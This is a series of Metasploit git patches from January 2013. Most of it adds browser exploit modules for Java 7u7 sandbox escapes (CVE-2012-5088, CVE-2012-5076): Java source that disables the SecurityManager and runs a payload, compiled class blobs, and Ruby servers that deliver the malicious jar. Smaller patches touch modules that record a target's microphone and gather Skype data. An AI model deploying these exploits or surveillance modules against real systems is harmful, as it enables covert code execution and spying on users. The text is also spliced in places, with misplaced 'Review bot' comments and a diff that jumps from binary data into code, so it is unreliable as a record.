From: sinn3r Date: Thu, 17 Jan 2013 12:30:02 -0600 Subject: [PATCH 052/421] Avoid saying "webcam", might be misleading. --- modules/post/multi/manage/record_mic.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 134ad0fbeda2..8121aa07bcba 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -63,7 +63,7 @@ def run if data print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)") p = store_loot( - "#{rhost}.webcam.snapshot", + "#{rhost}.audio", 'application/octet-stream', rhost, data, From 419b32b7427d1bb0b960d34b8172da8aecabb7d0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 12:45:03 -0600 Subject: [PATCH 053/421] Can be used against multiple platforms since it supports java --- modules/post/multi/manage/record_mic.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 8121aa07bcba..73519ea006e4 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -16,11 +16,13 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Multi Manage Record Microphone', 'Description' => %q{ - This module will enable and record your target's microphone. + This module will enable and record your target's microphone. + For non-Windows targets, please use Java meterpreter to be + able to use this feature. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win'], + 'Platform' => [ 'win', 'linux', 'osx' ], 'SessionTypes' => [ 'meterpreter' ] )) From 624ef9a32918a64e78c1b9714a1a4b5c1bb23615 Mon Sep 17 00:00:00 2001 
From: Charles Smith Date: Thu, 17 Jan 2013 14:04:52 -0500 Subject: [PATCH 054/421] Fixed a typo in the skype_enum module. "platfom" instead of "platform" fixed. --- modules/post/multi/gather/skype_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index eaad0884e7b3..6b4291f989b4 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -75,7 +75,7 @@ def run process_db(db_in_loot,p['name']) end end - elsif (session.platfom =~ /win/ and session.type =~ /meter/) + elsif (session.platform =~ /win/ and session.type =~ /meter/) # Iterate thru each user profile in a Windows System using Meterpreter Post API grab_user_profiles().each do |p| if check_skype(p['AppData'],p['UserName']) From d0b9808fc7e3185263c4169ef923b697a1fa4d39 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:14:49 +0100 Subject: [PATCH 055/421] Added module for CVE-2012-5088 --- data/exploits/cve-2012-5088/B.class | Bin 0 -> 619 bytes data/exploits/cve-2012-5088/Exploit.class | Bin 0 -> 2342 bytes external/source/exploits/cve-2012-5088/B.java | 19 +++ .../exploits/cve-2012-5088/Exploit.java | 66 +++++++++ .../source/exploits/cve-2012-5088/Makefile | 16 +++ .../multi/browser/java_jre17_method_handle.rb | 130 ++++++++++++++++++ 6 files changed, 231 insertions(+) create mode 100755 data/exploits/cve-2012-5088/B.class create mode 100755 data/exploits/cve-2012-5088/Exploit.class create mode 100755 external/source/exploits/cve-2012-5088/B.java create mode 100755 external/source/exploits/cve-2012-5088/Exploit.java create mode 100755 external/source/exploits/cve-2012-5088/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_method_handle.rb 
diff --git a/data/exploits/cve-2012-5088/B.class b/data/exploits/cve-2012-5088/B.class new file mode 100755 index 0000000000000000000000000000000000000000..953d5408a7a15e180bfb1570604cbab55bca2e5a GIT binary patch literal 619 zcmah`%TB^j5Is{W)moK@;v2<{g@r6!q9$r|g^vV+ad{~>qzWzRgUA=T)s;pQKfsSt zr^SdG6LXW9J7?ycb04p7PcHzrv7uuOSsk;O(~#3Kj|B~j8kRIH6Ouc&V+VVLgjsA5 z)I+x=2{TpOk*8s|DZRRAb{Lte1;V;M5xuyM**PY8p+lH8i`6U97v+v{+U2w6m9&Bi zL9e-?XUStb;wKNbq7eh*n9#6dU=?{nc0@b6v1Bi>T}Q*3fpruJsZn<*N}vP6W(@n% z3Ozd*l+Qi8&lYXj`jXhUA|XQl=j6U+N#8$ooxpQD9qAE_mOG*ocFo~E{@1SjdE;*f zt_}P^b_p3@2DQ(lo(M;@BisC^PyAlLx|L!B1tj^;2pWH&!kOQUqs~>Gv%-10^Z+V7 zLbs{c^P3`kZ}<+!hA^#nvBc1!tpl8RT+J_CgHk_0nBpDNtl-r!#fgg zaNOj$B^(wwQWDa_XR!mfaYq>MO1Q^yUqXgsNy7Ug(6Wpbe87?A_>g0jA#}yGO!q27 zdwg`6Auw;}4TkQtX&JXG#WllO($@-P2?#fa&Wx+)wior1XZAp*IX)sl203F_oSbpf z6#mMMy;8w8-Ncr@qbqn5XBdXWI%(R;xqa7|bsT;FPQ@)%+>GlOdQrj0_=JJaC2|G5 zTvqTYJ|k!aI@T2AkXK+}onu46CQRb!p%rv%BRMY)F!VGm1Zi62xrJ?lT(_OudeKl& zK(WQ`&f1odqqN4$6)Ryo8;PR*z$_GWk99fcm?bx1TCU+(dLc1y(`wIEV8LdXd6gr# z49jqI*T{Pe)3%;BoO&HR=BBk{ZyU))!`-y=3%ZpTwHs{Y(Xzj^U!okgP+~ZJgo_VR zK9#oZ?F#vY>I)@h5fzVyL8a0EN_awOupEpuZHbR;;EFF9IGJ z&QD&b;vZTu-OX8Nqf#_1m%8#ye6($E8)zEC&Hc9iq zQugi*hTbMtJ`%&^iwurTyH@3}W$dQt%IQ{)bc?kJewbN=wAIVryEA!L-!ITRgLo8m z(_-jvsZYIamob7<^koshHZbw7r7=!VBQ!IbgJVy@p3s6CpGNVC0U`(>N|v#@d)pd9 z^Z^0;<|njepQ1h8djda8i(^#;BEc#`T0jj}(WQ|(jxYI#IGsBCbeUX6aWzlxC+c7T(Q5lBA~Lb8YK5#Av6go-;DqVX6c z45ACeP`x%di3BynG&R8t={iqsaF4w6r1CDt@f9ZUEzaV5^7;))Ji{dZz+3nWQ}`Rx zY#8U*G|saHTwq(c$iBb~`x2MfLtLZCSJ>CMPADMkz;g;1 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { 
"sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); + MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); + MethodType localMethodType2 = MethodType.methodType(Void.TYPE); + MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); + Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); + MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); + MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); + MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); + MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); + Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); + MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); + MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); + Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer }); + localClass3.newInstance(); + Payload.main(null); + //Runtime.getRuntime().exec("calc.exe"); + } + catch(Throwable ex) + { + //ex.printStackTrace(); + } + } + +} 
diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile new file mode 100755 index 000000000000..abc39b7a2c0d --- /dev/null +++ b/external/source/exploits/cve-2012-5088/Makefile @@ -0,0 +1,16 @@ +CLASSES = \ + Exploit.java \ + B.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/cve-2013-0422/ + mv B.class ../../../../data/exploits/cve-2013-0422/ + +clean: + rm -rf *.class diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb new file mode 100644 index 000000000000..89fd3db6fb7d --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb 
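Review bot: The `install` target moves `Exploit.class` and `B.class` into `data/exploits/cve-2013-0422/`, but this Makefile lives in the `cve-2012-5088` source directory and the commit adds the compiled classes under `data/exploits/cve-2012-5088/`. Running `make install` would therefore overwrite any same-named class files in the other directory and leave this module's own directory stale. Both `mv` destinations should read `../../../../data/exploits/cve-2012-5088/`.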
@@ -0,0 +1,130 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java Applet Method Handle Remote Code Execution', + 'Description' => %q{ + This module abuses the Method Handle class from a Java Applet to run arbitrary + Java code outside of the sandbox. The vulnerability affects Java version 7u7 and + earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery at security-explorations.com + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5088' ], + [ 'URL', '86352' ], + [ 'BID', '56057' ], + [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], + [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 10 2013' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", 
"Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class") + @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @exploit_class_name = rand_text_alpha("Exploit".length) + @exploit_class.gsub!("Exploit", @exploit_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@exploit_class_name}.class", @exploit_class) + jar.add_file("B.class", @loader_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From 78279a03979a268165fe2dffc548235e9e6948d4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:27:47 +0100 Subject: [PATCH 056/421] Added new module for cve-2012-5076 --- data/exploits/cve-2012-5076_2/B.class | Bin 0 -> 619 bytes data/exploits/cve-2012-5076_2/Exploit.class | Bin 0 -> 2780 bytes .../source/exploits/cve-2012-5076_2/B.java | 19 +++ .../exploits/cve-2012-5076_2/Exploit.java | 78 +++++++++++ .../source/exploits/cve-2012-5076_2/Makefile | 18 +++ ...e17_glassfish_averagerangestatisticimpl.rb | 132 ++++++++++++++++++ 6 files changed, 247 insertions(+) create mode 100755 data/exploits/cve-2012-5076_2/B.class create mode 100755 data/exploits/cve-2012-5076_2/Exploit.class create mode 100755 external/source/exploits/cve-2012-5076_2/B.java create mode 100755 external/source/exploits/cve-2012-5076_2/Exploit.java create mode 100755 external/source/exploits/cve-2012-5076_2/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb 
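Review bot: In `References`, the entry `[ 'URL', '86352' ]` gives a bare number as a URL, so the module info will show a reference that resolves to nothing. The sibling module in this series uses `[ 'OSVDB', '86363' ]`, so this is presumably meant to be `[ 'OSVDB', '86352' ]`; please confirm the id against the advisory before changing the type. Wrong reference types also break any lookup that maps modules to advisories by reference id.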
diff --git a/data/exploits/cve-2012-5076_2/B.class b/data/exploits/cve-2012-5076_2/B.class new file mode 100755 index 0000000000000000000000000000000000000000..953d5408a7a15e180bfb1570604cbab55bca2e5a GIT binary patch literal 619 zcmah`%TB^j5Is{W)moK@;v2<{g@r6!q9$r|g^vV+ad{~>qzWzRgUA=T)s;pQKfsSt zr^SdG6LXW9J7?ycb04p7PcHzrv7uuOSsk;O(~#3Kj|B~j8kRIH6Ouc&V+VVLgjsA5 z)I+x=2{TpOk*8s|DZRRAb{Lte1;V;M5xuyM**PY8p+lH8i`6U97v+v{+U2w6m9&Bi zL9e-?XUStb;wKNbq7eh*n9#6dU=?{nc0@b6v1Bi>T}Q*3fpruJsZn<*N}vP6W(@n% z3Ozd*l+Qi8&lYXj`jXhUA|XQl=j6U+N#8$ooxpQD9qAE_mOG*ocFo~E{@1SjdE;*f zt_}P^b_p3@2DQ(lo(M;@BisC^PyAlLx|L!B1tj^;2pWH&!kOQUqs~>Gv%-10^Z+V7 zLbhbA*|GU)~H z7rb9yee#tDpU|~Jmne%@ef1Cc3w-if+-D|jCf2gLvewL*efIU+-`P38|MT-b08isv z5d%;Jq(rnq5fR1tAf6Ku#;}MB7~$ek{um2loQt0iVnV=0zPu!0GKjQ@2&M#F=I@Mv zD*|RjT*V7P%!=qiHi$V9FJeB3YazUZ9N&DI?<@#-C5Tt~@-+dkbNL%VsND6Uh&&1c zGyzKjiVS{RtJ)_S0vXd>sZ|)Hv|(u0cuB2RwJO8$%yo5DO_o%nnAD9`b45!|Yxc5P zm{g5INvj@p?Na37yl&|BFhhHMV4lG@ZWc6#NJclbE4A{XX3eRKC6f5K8bdg1tNE2_ zwc?1KbW#GADK!Q$Yu2p1c2Vd0(!_eDWa@T;Cn6z%BtyTGlx`-+Hf(Lwveb>4nq8^c zS=-XovIHI18HBM!o|hqE1toGVp$tQUiHd|bVKE%!UJ|^tgj-sor8Eh%AOr%X1~QQ* z5)M2PY}6Pg^JY0&tr+f!9@35$7X*rK6b0On@D|=CT$W7h zidxnryn}Zc1}XOh<(?>;H}q0Tb#SicExlqBEN&5rag$c-wt)8}ypInU&h5qOl15Zg zZLQ$ol`++VW(oLE!bkX+Cv#K6C-{`1w^@`&lc76L?X)$IOu}b8=eC70ZvQz$M?qU6 zhBX@U1-=yUm4vVH4MVKyb#B=**IfDu4LUJIoqe@ZDQR|c)Ol?g5wp_9HlG-RMa_0X zkV1UGb0i!gkv~QXvs%@m?P%4dA;Uo2qw2OH)v#`jKpuQlYJtvUd|_-LP46{Jw~74% zeW%m>Ky}#WHrq)(KCm!Gbl5$Db7Z&j3sHV9xfw?O$7aEksB7b`($bbn#KOkOr(}oY zQ&UqOlSXZOkxWhTVgfFC8M5AFT(YM;ZvGS5n`T4Vn`cARIN7@oEr$I~ZnPYuxs3{+ zKV@gcxgVq63|(wI3GM`Ihd;tgB#suG!=7hQAL?)?lsg@IYi`+fhcX3p2jp&3oA~OQ zUDNI5QL9)hYlh8-eSEI~cQ)~xH+ABzZ!ULrf==uXXc$iJtasM}IOLRmgyTgsr)pcZ zylv8~p4sWd6RHIS$H%S_wjt`^G3Is4uBkM7TX?ujm%ZTZt?wO%ww9(UR3lHc>S-Ar z+hmOr+tjM_AD6tUZj@+D5}svMHyHX_I~oc9WsSIsC3GmuK#^XM3!QBjQj55`_V&kR~?6yZn@jf3I$F8wWJaG%Y%xw-j zOR-@bC!{&z77oy}A3+>MCyqeIQTiRDRvo8XB3%)weU~tZ1q`7?(lzSIO={tHWc>q9 z<0qWKJv@Wo@GSly?LU#i-xy{gTwr||VW%+8&SHY4aG9b`vJ1$NU*H^k4=9*lz-a+z 
p1d1$>7d)WmH)YI~u?T2&nm^8RBAp}qHi|byZ;>kM!8Bzk{|iHH?YIB{ literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2012-5076_2/B.java b/external/source/exploits/cve-2012-5076_2/B.java new file mode 100755 index 000000000000..fec276706019 --- /dev/null +++ b/external/source/exploits/cve-2012-5076_2/B.java @@ -0,0 +1,19 @@ +import java.security.AccessController; +import java.security.PrivilegedExceptionAction; + +public class B + implements PrivilegedExceptionAction +{ + public B() + { + try + { + AccessController.doPrivileged(this); } catch (Exception e) { + } + } + + public Object run() { + System.setSecurityManager(null); + return new Object(); + } +} diff --git a/external/source/exploits/cve-2012-5076_2/Exploit.java b/external/source/exploits/cve-2012-5076_2/Exploit.java new file mode 100755 index 000000000000..21111fb258b4 --- /dev/null +++ b/external/source/exploits/cve-2012-5076_2/Exploit.java 
@@ -0,0 +1,78 @@ +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import metasploit.Payload; +//import java.lang.Runtime; +import java.applet.Applet; +import java.lang.invoke.MethodHandle; +import java.lang.invoke.MethodHandles; +import java.lang.invoke.MethodType; +import java.lang.reflect.Method; +import com.sun.org.glassfish.external.statistics.impl.*; + +public class Exploit extends Applet +{ + public static MethodHandles.Lookup test0; + + public Exploit() + { + } + + + public void init() + { + try + { + + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + byte[] buffer = new byte[8192]; + int length; + + // read in the class file from the jar + InputStream is = getClass().getResourceAsStream("B.class"); + // and write it out to the byte array stream + while( ( length = is.read( buffer ) ) > 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + Class c = Class.forName("java.lang.invoke.MethodHandles"); + Method m = c.getMethod("lookup", new Class[0]); + AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0); + MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]); + + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + + // Instance of sun.org.mozilla.javascript.internal.Context + MethodType localMethodType1 = MethodType.methodType(Void.TYPE); + MethodHandle localMethodHandle1 = test.findConstructor(localClass1, 
localMethodType1); + Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]); + + // Context.createClassLoader + MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class); + MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2); + Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null }); + + // GeneratedClassLoader.defineClass + MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); + MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3); + Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer }); + + //New instance of the helper Class + localClass3.newInstance(); + + Payload.main(null); + //Runtime.getRuntime().exec("calc.exe"); + } + catch(Throwable ex) + { + //ex.printStackTrace(); + } + } + +} diff --git a/external/source/exploits/cve-2012-5076_2/Makefile b/external/source/exploits/cve-2012-5076_2/Makefile new file mode 100755 index 000000000000..e93911b8ed42 --- /dev/null +++ b/external/source/exploits/cve-2012-5076_2/Makefile @@ -0,0 +1,18 @@ +# rt.jar must be in the classpath! + +CLASSES = \ + Exploit.java \ + B.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/cve-2013-0422/ + mv B.class ../../../../data/exploits/cve-2013-0422/ + +clean: + rm -rf *.class diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb new file mode 100644 index 000000000000..5fabb2f33867 --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb 
@@ -0,0 +1,132 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java Applet JMX Remote Code Execution', + 'Description' => %q{ + This module abuses the AverageRangeStatisticImpl from a Java Applet to run + arbitrary Java code outside of the sandbox, a different exploit vector than the one + exploited in the wild in November of 2012. The vulnerability affects Java version + 7u7 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery at security-explorations + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5076' ], + [ 'OSVDB', '86363' ], + [ 'BID', '56054' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ], + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ], + [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, 
+ 'DisclosureDate' => 'Oct 16 2012' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class") + @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @exploit_class_name = rand_text_alpha("Exploit".length) + @exploit_class.gsub!("Exploit", @exploit_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@exploit_class_name}.class", @exploit_class) + jar.add_file("B.class", @loader_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From 670b4e8e0694b5a08a1a4212f75d6db1cb9a64ed Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:39:41 +0100 Subject: [PATCH 057/421] cleanup --- .../source/exploits/cve-2012-5076_2/Exploit.java | 16 ++++++++-------- ..._jre17_glassfish_averagerangestatisticimpl.rb | 2 +- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/external/source/exploits/cve-2012-5076_2/Exploit.java b/external/source/exploits/cve-2012-5076_2/Exploit.java index 21111fb258b4..78292012fb3a 100755 --- a/external/source/exploits/cve-2012-5076_2/Exploit.java +++ b/external/source/exploits/cve-2012-5076_2/Exploit.java 
@@ -38,15 +38,15 @@ public void init() // convert it to a simple byte array buffer = bos.toByteArray(); - Class c = Class.forName("java.lang.invoke.MethodHandles"); - Method m = c.getMethod("lookup", new Class[0]); - AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0); + Class c = Class.forName("java.lang.invoke.MethodHandles"); + Method m = c.getMethod("lookup", new Class[0]); + AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0); MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]); - - MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); - MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0); - Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); - Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); // Instance of sun.org.mozilla.javascript.internal.Context MethodType localMethodType1 = MethodType.methodType(Void.TYPE); diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 5fabb2f33867..72e5c67f3672 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb 
+++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -43,7 +43,7 @@ def initialize( info = {} ) [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Payload' => { 'Space' => 20480, 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', From a43b218917448c8806f5383ca38e8a71f8dd2ea7 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 17 Jan 2013 12:43:06 -0800 Subject: [PATCH 058/421] Line full of whitespace --- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index da896c3a6b0e..83dde3257ea1 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -60,7 +60,7 @@ def get_xml_rpc_url(ip) vprint_status("#{ip} - Enumerating XML-RPC URI...") begin - + uri = target_uri.path uri << '/' if uri[-1,1] != '/' From ef16a7fd247f5f2129789919374a069dca7a854e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:45:13 +0100 Subject: [PATCH 059/421] cleanup --- external/source/exploits/cve-2012-5088/Exploit.java | 10 +++++----- .../exploits/multi/browser/java_jre17_method_handle.rb | 4 ++-- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/external/source/exploits/cve-2012-5088/Exploit.java 